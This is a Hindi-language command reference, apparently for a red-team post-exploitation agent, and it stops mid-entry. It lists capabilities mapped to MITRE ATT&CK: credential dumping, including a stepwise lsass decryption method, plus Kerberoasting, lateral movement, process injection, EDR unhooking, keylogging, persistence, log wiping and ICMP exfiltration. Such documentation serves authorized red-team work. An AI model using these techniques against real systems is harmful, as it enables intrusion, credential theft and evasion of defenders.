find-admin | `find-admin -hosts <targets> -username <user> -password <pass> [-method smb\|winrm\|both] [-hash <NT>] [-action scan\|auto-move] [-lateral_method psexec\|wmi] [-lateral_command <cmd>]` | होस्ट स्वीप करें यह पता लगाने के लिए कि SMB (C$ शेयर) और/या WinRM के माध्यम से क्रेडेंशियल्स का एडमिन एक्सेस कहाँ है। **auto-move**: स्वचालित उपकार्य श्रृंखला — एडमिन होस्ट खोजें फिर psexec/wmi के माध्यम से प्रत्येक पर पार्श्व रूप से जाएं। CIDR, IP रेंज, PTH, समानांतर स्कैनिंग का समर्थन करता है (T1021.002, T1021.006)।
firewall | `firewall -action <list\|add\|delete\|enable\|disable\|status\|pf-add\|pf-delete\|pf-list> [-name <rule>] [-direction <in\|out>] [-protocol <tcp\|udp\|any>] [-port <port>]` | **(विंडोज, मैकओएस, लिनक्स)** फ़ायरवॉल नियम प्रबंधित करें। विंडोज: COM API. macOS: ALF + pf एंकर किए गए नियम। लिनक्स: iptables/nftables (स्वचालित रूप से पहचाना गया)। macOS पैकेट फ़िल्टरिंग के लिए PF एंकर समर्थन। MITRE T1562.004.
getprivs | `getprivs -action list\|enable\|disable\|strip [-privilege <name>]` | **(विंडोज, मैकओएस, लिनक्स)** विशेषाधिकार/क्षमताएं सूचीबद्ध करें। विंडोज: सक्षम/अक्षम/स्ट्रिप के साथ टोकन विशेषाधिकार। लिनक्स: प्रक्रिया क्षमताएं (CapEff/CapPrm) + SELinux/AppArmor संदर्भ। macOS: एंटाइटलमेंट, सैंडबॉक्स, समूह (T1134.002)।
getsystem | `getsystem [-technique steal\|potato\|check\|sudo\|osascript]` | **(विंडोज, लिनक्स, मैकओएस)** विशेषाधिकार वृद्धि। विंडोज: टोकन चोरी या DCOM पोटैटो के माध्यम से SYSTEM. लिनक्स: वृद्धि वैक्टर जांचें (SUID, sudo, क्षमताएं, डॉकर) या sudo एलिवेशन का प्रयास करें। macOS: वैक्टर जांचें, sudo, या osascript एडमिन प्रॉम्प्ट (T1134, T1548)।
gpp-password | `gpp-password -server <DC> -username <user@domain> -password <pass>` | एन्क्रिप्टेड cpassword विशेषताओं वाली GPP XML फ़ाइलों के लिए SYSVOL खोजें और प्रकाशित AES कुंजी (MS14-025) का उपयोग करके डिक्रिप्ट करें। SMB के माध्यम से क्रॉस-प्लेटफ़ॉर्म (T1552.006)।
gpo | `gpo -action <list\|links\|find\|all> -server <DC> -username <user@domain> -password <pass> [-filter <name>]` | LDAP के माध्यम से समूह नीति ऑब्जेक्ट गणना करें — GPO सूचीबद्ध करें, प्रवर्तन के साथ लिंक मैप करें, दिलचस्प CSE सेटिंग्स खोजें। क्रॉस-प्लेटफ़ॉर्म (T1615)।
grep | `grep -pattern <regex> [-path <dir>] [-extensions .txt,.xml] [-ignore_case] [-max_results 100]` | regex पैटर्न के लिए फ़ाइल सामग्री खोजें। एक्सटेंशन फ़िल्टरिंग, संदर्भ पंक्तियों और बाइनरी फ़ाइल छोड़ने के साथ पुनरावर्ती निर्देशिका खोज। क्रॉस-प्लेटफ़ॉर्म (T1083, T1552.001)।
hash | `hash -path <file_or_dir> [-algorithm md5\|sha1\|sha256\|sha512] [-recursive true] [-pattern *.exe] [-max_files 500]` | फ़ाइल हैश (MD5, SHA-1, SHA-256, SHA-512) की गणना करें। ग्लोब पैटर्न फ़िल्टरिंग और गहराई नियंत्रण के साथ एकल फ़ाइलें या निर्देशिकाएं। क्रॉस-प्लेटफ़ॉर्म (T1083)।
hexdump | `hexdump -path <file> [-offset <bytes>] [-length <bytes>]` | xxd-शैली हेक्स+ASCII प्रारूप में फ़ाइल सामग्री प्रदर्शित करें। विशिष्ट क्षेत्रों की जांच के लिए ऑफ़सेट/लंबाई नियंत्रण, अधिकतम 4096 बाइट्स। क्रॉस-प्लेटफ़ॉर्म (T1005)।
handles | `handles -pid <pid> [-type File] [-show_names] [-max_count 500]` | **(विंडोज, लिनक्स, मैकओएस)** एक प्रक्रिया में खुले हैंडल/फ़ाइल डिस्क्रिप्टर गणना करें। विंडोज: NtQuerySystemInformation. लिनक्स: /proc/pid/fd. macOS: lsof (T1057, T1082)।
hashdump | `hashdump [-action dump\|insitu\|insitu-full\|tickets\|auto-spray] [-targets <hosts>] [-format json]` | **(विंडोज, लिनक्स, मैकओएस)** स्थानीय खाता पासवर्ड हैश निकालें। विंडोज: SAM रजिस्ट्री से NTLM हैश (SYSTEM आवश्यक); **insitu**: प्रक्रिया में LSA APIs के माध्यम से सक्रिय लॉगऑन सत्र गणना (एडमिन आवश्यक); **insitu-full**: lsass.exe को PROCESS_VM_READ के साथ खोलें, LogonSessionList के लिए lsasrv.dll सिगस्कैन करें, लिंक्ड लिस्ट घूमें, प्रत्येक नोड पर KIWI_MSV1_0_LIST_63 लेआउट ओवरले करें LUID/UserName/Domain/AuthPackage/LogonType/Credentials-pointer निकालने के लिए, प्रति-AuthPackage क्रेडेंशियल चेन credentials_ptr पर घूमें प्रत्येक KIWI_MSV1_0_PRIMARY_CREDENTIAL_ENC लिफाफा कैप्चर करने के लिए, IV / h3DesKey / hAesKey BCrypt कुंजी ग्लोबल्स प्लस रॉ 16-बाइट IV / 24-बाइट 3DES / 32-बाइट AES कुंजी बाइट्स प्राप्त करने के लिए LsaInitializeProtectedMemory_Internal सिगस्कैन करें, प्रत्येक कैप्चर किए गए सिफरटेक्स्ट ब्लॉब को AES-256-CFB / 3DES-CBC डिक्रिप्ट करें (प्रति-ब्लॉब `len % 8` द्वारा चयनित), और NT/LM/SHA हैश निकालने के लिए KIWI_MSV1_0_PRIMARY_CREDENTIAL_10_NEW लेआउट ओवरले करें — `username:rid:lm:nt:::` प्रारूप में उत्सर्जित करें जो dump-action ProcessResponse क्रेडेंशियल-वॉल्ट हुक के साथ संगत है (Phase 2B + 2C-i + 2C-ii-a + 2C-ii-b + 2C-ii-c, Win10 21H2 — Win11 23H2, एडमिन आवश्यक)। लिनक्स: /etc/shadow हैश हैश-प्रकार पहचान के साथ (रूट आवश्यक)। macOS: डायरेक्टरी सर्विसेज PBKDF2 हैश उपयोगकर्ता plists से (रूट आवश्यक)। **auto-spray**: हैश डंप करें फिर उन्हें स्वचालित रूप से cred-check के माध्यम से लक्ष्य होस्ट पर स्प्रे करें। MITRE T1003.002, T1003.008.
history-scrub | `history-scrub [-action list\|clear\|clear-all] [-user <username>]` | शेल/एप्लिकेशन कमांड हिस्ट्री फ़ाइलें सूचीबद्ध या साफ़ करें। bash, zsh, fish, PowerShell, python, mysql और अधिक को कवर करता है। क्रॉस-प्लेटफ़ॉर्म (T1070.003)।
hollow | `hollow -filename <shellcode> [-target <process>] [-ppid <pid>] [-block_dlls true]` | प्रक्रिया होलोइंग — निलंबित प्रक्रिया बनाएं, शेलकोड लिखें, निष्पादन रीडायरेक्ट करें। **विंडोज:** CREATE_SUSPENDED + SetThreadContext, PPID स्पूफिंग, DLL ब्लॉकिंग, PEB सजावट (ImagePath/CommandLine/WindowTitle मास्किंग). **लिनक्स (amd64/arm64):** PTRACE_TRACEME + /proc/mem लेखन. **macOS:** ptrace + Mach VM APIs (task_for_pid, mach_vm_allocate, mach_vm_write, mach_vm_protect) — रूट आवश्यक। MITRE T1055.012, T1036.
ide-recon | `ide-recon -action <vscode\|jetbrains\|all> [-user <filter>]` | IDE कॉन्फ़िगरेशन गणना करें — VS Code एक्सटेंशन, रिमोट SSH होस्ट, हाल के प्रोजेक्ट, रहस्यों के साथ सेटिंग्स। JetBrains डेटा स्रोत, डिप्लॉयमेंट सर्वर, हाल के प्रोजेक्ट। क्रॉस-प्लेटफ़ॉर्म (T1005, T1083)।
ifconfig | `ifconfig` | पतों, MAC, MTU और फ़्लैग के साथ नेटवर्क इंटरफ़ेस सूचीबद्ध करें। क्रॉस-प्लेटफ़ॉर्म (विंडोज/लिनक्स/मैकओएस)।
inline-assembly | `inline-assembly` | **(केवल विंडोज)** CLR का उपयोग करके मेमोरी में एक .NET असेंबली निष्पादित करें। कमांड-लाइन तर्कों का समर्थन करता है। AMSI पैचिंग वर्कफ़्लो के लिए पहले `start-clr` का उपयोग करें।
inline-execute | `inline-execute` | **(केवल विंडोज)** मेमोरी में एक बीकन ऑब्जेक्ट फ़ाइल (BOF/COFF) निष्पादित करें। सभी तर्क प्रकारों का समर्थन करता है: स्ट्रिंग्स (z), वाइड स्ट्रिंग्स (Z), पूर्णांक (i), शॉर्ट्स (s), और बाइनरी (b)।
reflective-load | `reflective-load -dll_b64 <base64_dll> [-function <export>]` | **(केवल विंडोज)** मेमोरी से एक मूल PE (DLL) को वर्तमान प्रक्रिया में लोड करें। सेक्शन कॉपी करने, रिलोकेशन फिक्सअप, इम्पोर्ट रेज़ॉल्यूशन और DllMain आह्वान के साथ मैन्युअल PE मैपिंग। वैकल्पिक रूप से निर्यातित फ़ंक्शन कॉल करें (T1620)।
iptables | `iptables -action <status\|rules\|nat\|add\|delete\|flush> [-rule <args>] [-table <name>]` | **(केवल लिनक्स)** iptables/nftables/ufw के माध्यम से लिनक्स फ़ायरवॉल गणना और प्रबंधन। IP फ़ॉरवर्डिंग, कनेक्शन ट्रैकिंग, नियम सूचीकरण और संशोधन। MITRE T1562.004.
jobkill | `jobkill -id <task-uuid>` | कार्य ID द्वारा चल रहे कार्य को रोकें। चल रहे कार्यों को सूचीबद्ध करने के लिए `jobs` का उपयोग करें। क्रॉस-प्लेटफ़ॉर्म।
jobs | `jobs` | वर्तमान में चल रहे कार्यों को कार्य ID, कमांड नाम और अवधि के साथ सूचीबद्ध करें। क्रॉस-प्लेटफ़ॉर्म।
jxa | `jxa -code '<script>' [-timeout 60]` or `jxa -file /path/to/script.js` | **(केवल मैकओएस)** Foundation, AppKit, Security फ्रेमवर्क तक ObjC ब्रिज एक्सेस के साथ जावास्क्रिप्ट फॉर ऑटोमेशन (JXA) स्क्रिप्ट निष्पादित करें। इनलाइन कोड और फ़ाइल इनपुट का समर्थन करता है (T1059.007)।
kerberoast | `kerberoast -server <DC> -username <user@domain> -password <pass> [-spn <SPN>]` | SPN खातों के लिए TGS टिकट का अनुरोध करें और ऑफ़लाइन क्रैकिंग के लिए हैशकैट प्रारूप में हैश निकालें। LDAP के माध्यम से स्वचालित गणना। क्रॉस-प्लेटफ़ॉर्म (T1558.003)।
klist | `klist -action <list\|purge\|dump\|import> [-server <filter>] [-ticket <base64>] [-path <path>]` | केर्बेरोस टिकट गणना करें, डंप करें, शुद्ध करें और आयात करें। आयात पास-द-टिकट सक्षम करता है: विंडोज LSA के माध्यम से kirbi इंजेक्ट करता है, लिनक्स/macOS ccache लिखता है + KRB5CCNAME सेट करता है। क्रॉस-प्लेटफ़ॉर्म (T1558, T1550.003)।
keychain | `keychain -action <list\|dump\|find-password\|find-internet\|find-cert> [-service <name>] [-server <host>]` | **(केवल मैकओएस)** macOS कीचेन एक्सेस करें — कीचेन सूचीबद्ध करें, मेटाडेटा डंप करें, सामान्य/इंटरनेट पासवर्ड खोजें, प्रमाणपत्र गणना करें।
kerb-delegation | `kerb-delegation -action <all\|unconstrained\|constrained\|rbcd\|monitor> -server <DC> -username <user@domain> -password <pass> [-duration <s>] [-interval <s>]` | केर्बेरोस प्रतिनिधिमंडल संबंधों की गणना करें — अनियंत्रित, नियंत्रित (प्रोटोकॉल संक्रमण के साथ), RBCD. **monitor** क्रिया (विंडोज/SYSTEM केवल) आने वाले TGT के लिए LSA को पोल करती है और kirbi ब्लॉब के रूप में निर्यात करती है। monitor को छोड़कर क्रॉस-प्लेटफ़ॉर्म (T1550.003, T1558)।
keylog | `keylog -action <start\|stop\|dump\|status\|clear>` | निम्न-स्तरीय कीबोर्ड लॉगर। विंडोज: SetWindowsHookEx. लिनक्स: /dev/input evdev. macOS: IOKit HID. Ctrl+V/Cmd+V पेस्ट ईवेंट का पता लगाता है और क्लिपबोर्ड सामग्री कैप्चर करता है। सभी प्लेटफ़ॉर्म पर विंडो संदर्भ ट्रैकिंग (T1056.001)।
lateral-check | `lateral-check -hosts <IPs/CIDRs> [-timeout <seconds>]` | लक्ष्यों के विरुद्ध पार्श्व आंदोलन विकल्पों का परीक्षण करें — SMB, WinRM, RDP, RPC, SSH कनेक्टिविटी जांचता है और लागू विधियों का सुझाव देता है। क्रॉस-प्लेटफ़ॉर्म (T1046, T1021)।
last | `last [-action logins\|failed\|reboot] [-count 25] [-user <username>]` | लॉगिन इतिहास, असफल लॉगिन प्रयास और सिस्टम बूट/शटडाउन ईवेंट दिखाएं। लिनक्स: wtmp/btmp पार्स करता है। विंडोज: सुरक्षा/सिस्टम ईवेंट लॉग। macOS: मूल `last` + यूनिफाइड लॉग। (T1087.001, T1110, T1082)।
ldap-query | `ldap-query -action <users\|computers\|groups\|domain-admins\|spns\|asrep\|admins\|disabled\|gpo\|ou\|password-never-expires\|trusts\|unconstrained\|constrained\|dacl\|gmsa\|bloodhound\|query> -server <DC>` | LDAP के माध्यम से Active Directory क्वेरी करें। उपयोगकर्ताओं, कंप्यूटरों, समूहों, डोमेन व्यवस्थापकों, सभी व्यवस्थापकों (adminCount), SPN, AS-REP रोस्ट योग्य, अक्षम खाते, GPO, OU, पासवर्ड-कभी-समाप्त नहीं, डोमेन ट्रस्ट, अनियंत्रित/नियंत्रित प्रतिनिधिमंडल, DACL विश्लेषण, gMSA पासवर्ड निष्कर्षण, BloodHound CE v6 संग्रह (ग्राफ विश्लेषण के लिए उपयोगकर्ता/कंप्यूटर/समूह/OU/GPO/ट्रस्ट), या कस्टम LDAP फ़िल्टर के लिए प्रीसेट क्वेरी। क्रॉस-प्लेटफ़ॉर्म (T1087.002, T1482, T1555, T1003, T1615)।
ldap-write | `ldap-write -action <add-member\|remove-member\|set-attr\|add-attr\|remove-attr\|set-spn\|disable\|enable\|set-password\|shadow-cred\|clear-shadow-cred\|create-machine\|rbcd\|delete\|gpo-task\|gpo-script\|template-esc1\|template-esc4> -server <DC> -target <obj>` | LDAP के माध्यम से AD ऑब्जेक्ट संशोधित करें। समूह सदस्यता, विशेषताएँ, SPN, खाता सक्षम/अक्षम, पासवर्ड रीसेट, छाया क्रेडेंशियल, मशीन खाता निर्माण, RBCD प्रतिनिधिमंडल, ऑब्जेक्ट हटाना। GPO दुरुपयोग: निर्धारित कार्य (gpo-task) या स्टार्टअप स्क्रिप्ट (gpo-script) इंजेक्ट करें। ADCS: ESC1/ESC4 शोषण के लिए प्रमाणपत्र टेम्पलेट संशोधित करें। क्रॉस-प्लेटफ़ॉर्म (T1098, T1556.006, T1484.001, T1649)।
kill | `kill -pid <PID>` | PID द्वारा एक प्रक्रिया को समाप्त करें। क्रॉस-प्लेटफ़ॉर्म (विंडोज/लिनक्स/मैकओएस)।
laps | `laps -server <DC> -username <user@domain> -password <pass> [-filter <computer>]` | LDAP के माध्यम से AD से LAPS पासवर्ड पढ़ें। LAPS v1 (ms-Mcs-AdmPwd) और विंडोज LAPS v2 (ms-LAPS-Password) का समर्थन करता है। क्रॉस-प्लेटफ़ॉर्म (T1552.006)।
lsa-secrets | `lsa-secrets -action <dump\|cached>` | **(केवल विंडोज)** LSA रहस्य (सेवा पासवर्ड, DPAPI कुंजी, मशीन खाता) और कैश्ड डोमेन क्रेडेंशियल (DCC2/MSCacheV2 हैशकैट प्रारूप) निकालें। SYSTEM आवश्यक (T1003.004, T1003.005)।
launchagent | `launchagent -action <install\|remove\|list> -label <com.example.name> [-path <exe>] [-daemon true]` | **(केवल मैकओएस)** LaunchAgent/LaunchDaemon स्थिरता स्थापित करें, हटाएं या सूचीबद्ध करें। RunAtLoad+KeepAlive के साथ plist बनाता है।
link | `link -host <ip> -port <port> [-connection_type tcp\|namedpipe] [-pipe_name <name>]` | आंतरिक पिवोटिंग के लिए TCP या नेम्ड पाइप के माध्यम से P2P एजेंट से लिंक करें। नेम्ड पाइप मोड विंडोज ट्रैफ़िक के लिए SMB पोर्ट 445 का उपयोग करता है। क्रॉस-प्लेटफ़ॉर्म TCP, विंडोज-केवल नेम्ड पाइप (T1572)।
ln | `ln -target <existing> -link <new> [-symbolic true] [-force true]` | प्रतीकात्मक या हार्ड लिंक बनाएं। सिमलिंक गैर-मौजूद पथों की ओर इंगित कर सकते हैं। फ़ोर्स मोड मौजूदा लिंक को बदल देता है। क्रॉस-प्लेटफ़ॉर्म (T1036)।
linux-logs | `linux-logs -action <list\|read\|logins\|clear\|truncate\|shred> [-file <path>] [-search <filter>] [-lines <n>]` | **(केवल लिनक्स)** लिनक्स लॉग फ़ाइलें और बाइनरी लॉगिन रिकॉर्ड (wtmp/btmp/utmp) सूचीबद्ध करें, पढ़ें, साफ़ करें या छेड़छाड़ करें। चयनात्मक पंक्ति हटाने और सुरक्षित श्रेडिंग का समर्थन करता है (T1070.002)।
logonsessions | `logonsessions [-action list\|users] [-filter <name>]` | **(विंडोज, लिनक्स, मैकओएस)** सक्रिय लॉगऑन सत्र गणना करें — उपयोगकर्ता, सत्र ID, स्टेशन, कनेक्शन स्थिति। उपयोगकर्ता नाम से फ़िल्टर करें। विंडोज: WTS API. लिनक्स: utmp पार्सिंग. macOS: utmpx पार्सिंग.
lolbin | `lolbin -action <technique> -path <payload/code/URL> [-export <func>] [-args <extra>]` | **(विंडोज, लिनक्स, मैकओएस)** LOLBin/GTFOBin प्रॉक्सी निष्पादन। विंडोज: rundll32, msiexec, regsvcs, regasm, mshta, certutil, regsvr32, installutil, vbs. क्रॉस-प्लेटफ़ॉर्म: python, lua, perl, ruby, node, awk. लिनक्स: curl, wget, gcc. macOS: osascript, swift, open, curl. T1218/T1059.
ls | `ls [path]` | स्वामी/समूह और टाइमस्टैम्प के साथ फ़ाइलें और फ़ोल्डर सूचीबद्ध करें। फ़ाइल ब्राउज़र एकीकरण। डिफ़ॉल्ट रूप से cwd.
make-token | `make-token -username <user> -domain <domain> -password <pass> [-action impersonate\|spawn\|auto-verify -command <cmd>]` | **(केवल विंडोज)** क्रेडेंशियल से एक टोकन बनाएं: इसे प्रतिरूपित करें, एक प्रक्रिया स्पॉन करें, या **auto-verify** (प्रतिरूपित करें फिर whoami + getprivs श्रृंखला) (T1134.002)।
masquerade | `masquerade -source <file> -technique <type> [-disguise <value>] [-in_place]` | फ़ाइल मास्करेडिंग और छिपाना — फ़ाइलों को छिपाएं (डबल एक्सट, RtLO, स्पेस, प्रक्रिया मैच) या गणना से छुपाएं (हाइड/अनहाइड)। विंडोज: +H/+S विशेषताएँ। लिनक्स: डॉट-उपसर्ग। macOS: UF_HIDDEN + डॉट-उपसर्ग (T1036, T1564.001)।
mkdir | `mkdir <directory>` | एक नई निर्देशिका बनाएं (यदि आवश्यक हो तो अभिभावक निर्देशिकाएं बनाता है)।
module-stomp | `module-stomp -pid <PID> [-dll_name <DLL>]` | **(केवल विंडोज)** एक वैध DLL के .text सेक्शन को स्टॉम्प करके शेलकोड इंजेक्ट करें। शेलकोड हस्ताक्षरित DLL पता स्थान से निष्पादित होता है, निजी-मेमोरी डिटेक्शन को बायपास करता है (T1055.001)।
modules | `modules [-pid <PID>] [-filter <name>]` | वैकल्पिक नाम फ़िल्टरिंग के साथ एक प्रक्रिया में लोडेड मॉड्यूल/DLL/लाइब्रेरी सूचीबद्ध करें। क्रॉस-प्लेटफ़ॉर्म (T1057)।
mem-scan | `mem-scan -pid <PID> -pattern <string> [-hex] [-max_results <n>] [-context_bytes <n>]` | हेक्स डंप आउटपुट के साथ प्रक्रिया मेमोरी में बाइट पैटर्न खोजें। विंडोज: VirtualQueryEx/ReadProcessMemory. लिनक्स: /proc/pid/maps+mem. macOS: mach_vm_region/mach_vm_read (केवल स्व-स्कैन). स्ट्रिंग और हेक्स पैटर्न का समर्थन करता है। क्रॉस-प्लेटफ़ॉर्म (T1005, T1057)।
mount | `mount [-filter <substring>] [-fstype <type>]` | डिवाइस, माउंट पॉइंट, प्रकार और विकल्पों के साथ माउंटेड फ़ाइलसिस्टम सूचीबद्ध करें। नाम या फ़ाइलसिस्टम प्रकार द्वारा फ़िल्टरिंग का समर्थन करता है। क्रॉस-प्लेटफ़ॉर्म (T1082)।
mv | `mv <source> <destination>` | किसी फ़ाइल को स्रोत से गंतव्य पर ले जाएं या नाम बदलें।
named-pipes | `named-pipes [-filter <pattern>]` | **(विंडोज, लिनक्स, मैकओएस)** IPC खोज के लिए नेम्ड पाइप (विंडोज), यूनिक्स डोमेन सॉकेट और FIFO (लिनक्स/मैकओएस) सूचीबद्ध करें। सबस्ट्रिंग फ़िल्टरिंग का समर्थन करता है (T1083)।
net-enum | `net-enum -action <users\|groups\|groupmembers\|admins\|sessions\|shares\|domainusers\|domaingroups\|domaininfo\|loggedon\|mapped> [-target <host>] [-group <name>]` | **(विंडोज, लिनक्स, मैकओएस)** क्रॉस-प्लेटफ़ॉर्म नेटवर्क गणना। उपयोगकर्ता, समूह, समूह सदस्य, व्यवस्थापक, सत्र, शेयर। विंडोज: Win32 NetAPI (डोमेन क्वेरी, मैप की गई ड्राइव). लिनक्स: /etc/passwd + /etc/group + utmp + NFS/Samba. macOS: dscl + who + sharing. (T1033, T1049, T1087, T1135)।
net-group | `net-group -action <list\|members\|user\|privileged> -server <DC> [-group <name>] [-user <sAMAccountName>] -username <user@domain> -password <pass>` | LDAP के माध्यम से AD समूह सदस्यता गणना करें। पुनरावर्ती सदस्य समाधान, उपयोगकर्ता समूह लुकअप, विशेषाधिकार प्राप्त समूह गणना। क्रॉस-प्लेटफ़ॉर्म (T1069.002)।
net-user | `net-user -action <add\|delete\|info\|password\|group-add\|group-remove\|disable\|enable\|lockout> -username <name> [-password <pass>] [-group <group>]` | स्थानीय उपयोगकर्ता खाते और समूह सदस्यता प्रबंधित करें। विंडोज: netapi32 API. लिनक्स: useradd/userdel/usermod/chpasswd. macOS: dscl/dseditgroup. T1531 रैनसमवेयर सिमुलेशन के लिए अक्षम/सक्षम/लॉकआउट। क्रॉस-प्लेटफ़ॉर्म (T1136.001, T1098, T1531)।
net-stat | `net-stat [-state <LISTEN\|ESTABLISHED\|...>] [-proto <tcp\|udp>] [-port <number>] [-pid <number>]` | प्रोटोकॉल, स्थिति, PID और प्रक्रिया नाम के साथ सक्रिय नेटवर्क कनेक्शन और सुनने वाले पोर्ट सूचीबद्ध करें। स्थिति, प्रोटोकॉल, पोर्ट और प्रक्रिया ID द्वारा फ़िल्टरिंग का समर्थन करता है। क्रॉस-प्लेटफ़ॉर्म।
ntdll-unhook | `ntdll-unhook [-action unhook\|check] [-dll ntdll.dll\|kernel32.dll\|kernelbase.dll\|advapi32.dll\|user32.dll\|all] [-source disk\|knowndlls]` | **(केवल विंडोज)** एक साफ प्रति से .text सेक्शन को पुनर्स्थापित करके DLL से EDR इनलाइन हुक हटाएं। 5 DLL या `all` का समर्थन करता है। `check` बिना संशोधन के हुक रिपोर्ट करता है। `knowndlls` स्रोत \\KnownDlls\\ सेक्शन ऑब्जेक्ट का उपयोग करता है (डिस्क I/O से बचता है — अधिक OPSEC-अनुकूल) (T1562.001)।
syscalls | `syscalls [-action status\|list\|init]` | **(केवल विंडोज)** अप्रत्यक्ष सिस्कॉल रिज़ॉल्वर। ntdll निर्यात को पार्स करके Nt* सिस्कॉल नंबर हल करता है और स्टब उत्पन्न करता है जो ntdll के syscall;ret गैजेट पर कूदता है। सक्रिय होने पर, इंजेक्शन कमांड यूज़रलैंड API हुक को बायपास करते हैं (T1106)।
opus-injection | `opus-injection` | **(केवल विंडोज)** कॉलबैक-आधारित प्रक्रिया इंजेक्शन। वेरिएंट 1: Ctrl-C हैंडलर चेन। वेरिएंट 4: PEB KernelCallbackTable. [विवरण](https://github.com/galoryber/fawkes/blob/HEAD/research/injection-techniques.md#opus-injection)
persist | `persist -method <method> -action <install\|remove\|check>` | **(विंडोज, लिनक्स, मैकओएस)** स्थिरता स्थापित करें या हटाएं। विंडोज: रजिस्ट्री, स्टार्टअप-फ़ोल्डर, com-hijack, स्क्रीनसेवर, ifeo, विनलॉगन, प्रिंट-प्रोसेसर, एक्सेसिबिलिटी, एक्टिव-सेटअप, टाइम-प्रोवाइडर, पोर्ट-मॉनिटर, wmi-event (T1546.003), netsh-helper (T1546.007). लिनक्स: crontab, systemd, शेल-प्रोफ़ाइल, ssh-key, xdg-autostart, motd (रूट, T1546), rc-local (रूट, T1037.004), apt-hook (रूट, T1546), udev-rule (रूट, T1546). macOS: launchagent, पीरियोडिक (रूट, T1053.003), फ़ोल्डर-एक्शन (T1546), लॉगिन-आइटम (T1547.015), auth-प्लगइन (रूट, T1547.002), dylib-hijack (T1574.004, स्कैन/इंस्टॉल/रिमूव), xpc-सर्विस (MachServices + KeepAlive). सभी विधियां इंस्टॉल/रिमूव/लिस्ट का समर्थन करती हैं।
persist-enum | `persist-enum [-category <all\|platform-specific>]` | **(विंडोज, लिनक्स, मैकओएस)** स्थिरता तंत्र की केवल-पढ़ने योग्य गणना। विंडोज: रजिस्ट्री, स्टार्टअप, कार्य, सेवाएं। लिनक्स: cron, systemd, शेल प्रोफ़ाइल, SSH कुंजी, LD_PRELOAD, udev नियम, कर्नेल मॉड्यूल, motd, at नौकरियां, D-Bus सेवाएं, PAM मॉड्यूल, पैकेज हुक, logrotate स्क्रिप्ट, NetworkManager डिस्पैचर, anacron. macOS: LaunchAgents, लॉगिन आइटम, पीरियोडिक स्क्रिप्ट, auth प्लगइन, emond, at नौकरियां (T1547, T1546, T1053, T1543, T1556)।
password-managers | `password-managers [-depth <N>]` | पासवर्ड मैनेजर डेटाबेस और कॉन्फ़िग फ़ाइलें खोजें — KeePass (.kdbx), 1Password, Bitwarden, LastPass, Dashlane, KeePassXC. क्रॉस-प्लेटफ़ॉर्म (T1555)।
poolparty-injection | `poolparty-injection` | **(केवल विंडोज)** PoolParty तकनीकों का उपयोग करके शेलकोड इंजेक्ट करें जो विंडोज थ्रेड पूल आंतरिक का दुरुपयोग करती हैं। सभी 8 वेरिएंट समर्थित। [विवरण](https://github.com/galoryber/fawkes/blob/HEAD/research/injection-techniques.md#poolparty-injection)
ping | `ping -hosts <IP/CIDR/range> [-port 445]` or `ping -action exfil-icmp -target <IP> -file <path>` | TCP कनेक्ट होस्ट पहुंच योग्यता (T1018) + XOR एन्कोडिंग और जिटर के साथ इको अनुरोध पेलोड के माध्यम से ICMP डेटा एक्सफिल्ट्रेशन (T1048.003, T1095)।
pipe-server | `pipe-server -action <check\|impersonate> [-name <pipe>] [-timeout 30]` | **(केवल विंडोज)** विशेषाधिकार वृद्धि के लिए नेम्ड पाइप प्रतिरूपण। पाइप सर्वर बनाएं, विशेषाधिकार प्राप्त क्लाइंट कनेक्शन की प्रतीक्षा करें, टोकन प्रतिरूपित करें। SeImpersonatePrivilege आवश्यक (T1134.001)।
printspoofer | `printspoofer [-timeout 15]` | **(केवल विंडोज)** PrintSpoofer विशेषाधिकार वृद्धि — प्रिंट स्पूलर के माध्यम से SeImpersonate से SYSTEM. नेम्ड पाइप बनाएं, OpenPrinterW के माध्यम से स्पूलर कनेक्शन ट्रिगर करें, SYSTEM टोकन प्रतिरूपित करें। एक-चरण NETWORK SERVICE → SYSTEM (T1134.001)।
pkg-list | `pkg-list [-filter <substring>]` | स्थापित पैकेज और सॉफ़्टवेयर सूचीबद्ध करें। dpkg/rpm/apk (लिनक्स), Homebrew/Applications (macOS), या रजिस्ट्री अनइंस्टॉल कुंजी (विंडोज) गणना करता है। नाम फ़िल्टरिंग का समर्थन करता है। क्रॉस-प्लेटफ़ॉर्म (T1518)।
port-scan | `port-scan -hosts <IPs/CIDRs> [-ports <ports>] [-timeout <s>]` | नेटवर्क सेवा खोज के लिए TCP कनेक्ट स्कैन। CIDR, IP रेंज और पोर्ट रेंज का समर्थन करता है। क्रॉस-प्लेटफ़ॉर्म।
powershell | `powershell <command> [--encoded]` | **(केवल विंडोज)** OPSEC-हार्डन फ़्लैग (संक्षिप्त, यादृच्छिक) के साथ powershell.exe के माध्यम से एक PowerShell कमांड निष्पादित करें। प्रक्रिया ट्री से आर्ग्स छिपाने के लिए एन्कोडेड कमांड मोड का समर्थन करता है।
prefetch | `prefetch -action <list\|parse\|delete\|clear> [-name <exe>] [-count <max>]` | **(केवल विंडोज)** विंडोज प्रीफ़ेच फ़ाइलें पार्स और प्रबंधित करें। निष्पादित प्रोग्राम सूचीबद्ध करें, रन हिस्ट्री पार्स करें (8 टाइमस्टैम्प तक), विशिष्ट प्रविष्टियाँ हटाएं, या सभी साफ़ करें। MAM-संपीडित फ़ाइलों का समर्थन करता है (T1070.004)।
privesc-check | `privesc-check -action <all\|auto-escalate\|privileges\|services\|registry\|uac\|dll-hijack\|dll-plant\|dll-sideload\|dll-exports\|hijack-execute\|hijack-deploy\|hijack-cleanup\|hijack-trigger\|service-registry\|...>` | विशेषाधिकार वृद्धि गणना और शोषण। `auto-escalate`: स्वचालित उपकार्य श्रृंखला — सभी वैक्टर गणना करता है फिर सर्वोत्तम उपलब्ध वृद्धि का प्रयास करता है (UAC बाईपास, टोकन चोरी, या sudo)। `hijack-execute`: स्वचालित प्रॉक्सी DLL फैक्ट्री — लक्ष्य DLL निर्यात पढ़ता है, सर्वर एम्बेडेड शेलकोड के साथ प्रॉक्सी DLL संकलित करता है (mingw). `hijack-deploy`: प्रॉक्सी DLL तैनात करता है (मूल का नाम बदलता है, प्रॉक्सी रखता है). `hijack-trigger`: हाइजैक ट्रिगर करता है — किसी सेवा को पुनरारंभ करें (`-trigger restart -service_name <svc>`) या प्रॉक्सी DLL लोड करने के लिए एक प्रक्रिया स्पॉन करें (`-trigger spawn -source <exe>`). `hijack-cleanup`: तैनात हाइजैक को उलट देता है (प्रॉक्सी हटाता है, मूल पुनर्स्थापित करता है). विंडोज: टोकन विशेषाधिकार, अकोटेड सेवाएं, AlwaysInstallElevated, ऑटो-लॉगऑन, UAC, unattend फ़ाइलें, DLL 